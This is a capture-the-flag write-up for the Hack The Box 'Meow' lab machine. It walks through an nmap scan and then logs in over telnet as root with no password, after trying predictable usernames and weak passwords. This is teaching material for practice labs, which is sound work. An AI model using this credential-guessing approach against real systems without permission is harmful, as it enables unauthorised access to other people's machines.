HTB - Meow Writeup

HTB - Meow Writeup

Difficulty - Very Easy | Linux Machine

Tools

  • Nmap

Recon

First thing I'm going to do is run an nmap scan of the machine.

└─$ nmap -sC -sV -oA meow 10.129.45.206
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 23:35 EST
Nmap scan report for 10.129.45.206
Host is up (0.052s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Port 23 is open and is running a telnet service.

We can try to connect to this telnet port.

If you don't have telnet on your VM (virtual machine). I'm using Kali Linux in VirtualBox. The command to install it is: apt-get install telnet if this doesn't work then add sudo like so: sudo apt-get install telnet. sudo (superuser do) allows you to run some commands as the root user.

└─$ telnet 10.129.45.206
Trying 10.129.45.206...
Connected to 10.129.45.206.
Escape character is '^]'.


             ▐▌     ▄█▄           ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀      █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
     █▄█ █▄▄ ▐█▀▄        █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: 
Password:

We are presented with a login screen. However, so far we don't know what the username/password could be. We need to find some credentials so we can attempt to login.

Foothold

Since this machine is considered 'Very Easy'. We'll assume the login credentials would be something easy and predictable.

Some predictable usernames that are important:

  • admin
  • administrator
  • root

As for the password, let's assume there is none because sometimes they are left blank or super easy ones such as password, password123, or even 12345678.

Let's test these usernames out first with no password!

Meow login: admin
Password: 

Login incorrect
Meow login: administrator
Password: 

Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 26 Feb 2022 05:05:33 AM UTC

Well would ya look at that! We are able to login as the root user without a password!

We can confirm that we are indeed the root user:

root@Meow:~# whoami
root

And when we check the current directory, the flag.txt is the first thing we see:

root@Meow:~# ls                                                                             
flag.txt  snap

Then we can run the cat flag.txt command to reveal the flag! We're done!

Summary

I know that this is a super short and easy machine on Hack The Box, but it's still learning and practice experience. It's great for getting used to using Nmap and exploiting telnet. The issue with this telnet login is account misconfiguration. Where an important user, root in this case, doesn't have a password setup allowing attackers a super easy way into a system. This machine doesn't go in-depth on how to exploit telnet services, but least we're able to try logging in and understand that we can use predictable login credentials to brute-force our way in. Next time, if we run into another situation similar to this we can try doing this and if it doesn't work we can rule it out and try other methods.

Tags: Linux | Network | Account Misconfiguration